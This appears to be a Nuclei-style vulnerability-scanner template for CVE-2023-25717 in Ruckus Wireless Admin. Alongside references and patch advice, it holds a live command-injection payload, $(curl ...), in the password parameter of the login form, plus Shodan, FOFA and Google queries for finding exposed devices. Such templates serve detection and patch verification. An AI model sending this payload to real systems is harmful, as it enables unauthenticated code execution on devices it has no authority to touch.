Description
Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request.
Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request.
id: CVE-2023-25717
info:
name: Ruckus Wireless Admin - Remote Code Execution
author: parthmalhotra,pdresearch
severity: critical
description: |
Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request.
impact: |
Remote code execution vulnerability in Ruckus Wireless Admin allows attackers to execute arbitrary code on the target system.
remediation: |
Apply the latest security patches and updates provided by Ruckus Wireless to mitigate the vulnerability.
reference:
- https://cybir.com/2023/cve/proof-of-concept-ruckus-wireless-admin-10-4-unauthenticated-remote-code-execution-csrf-ssrf/
- https://support.ruckuswireless.com/security_bulletins/315
- https://nvd.nist.gov/vuln/detail/CVE-2023-25717
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-25717
cwe-id: CWE-94
epss-score: 0.98069
epss-percentile: 0.99909
cpe: cpe:2.3:a:ruckuswireless:ruckus_wireless_admin:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: ruckuswireless
product: ruckus_wireless_admin
shodan-query:
- title:"ruckus wireless"
- http.title:"ruckus wireless"
fofa-query: title="ruckus wireless"
google-query: intitle:"ruckus wireless"
tags: cve2023,cve,ruckus,rce,kev,ruckuswireless,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/forms/doLogin?login_username=admin&password=password$(curl%20{{interactsh-url}})&x=0&y=0"
matchers:
- type: dsl
dsl:
- contains(interactsh_protocol, 'http')
- contains_all(to_lower(interactsh_request), 'user-agent','curl')
- status_code_1 == 302
condition: and
# digest: 490a0046304402203d7a696af8ae2dea574b7a45ec652e304b4e3e509dc106c9d4db58277cef9f8b0220037ae1f9bfd8b2070a0452d9ab236fc4686795496e1febce30e9a2bc25c9357b:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.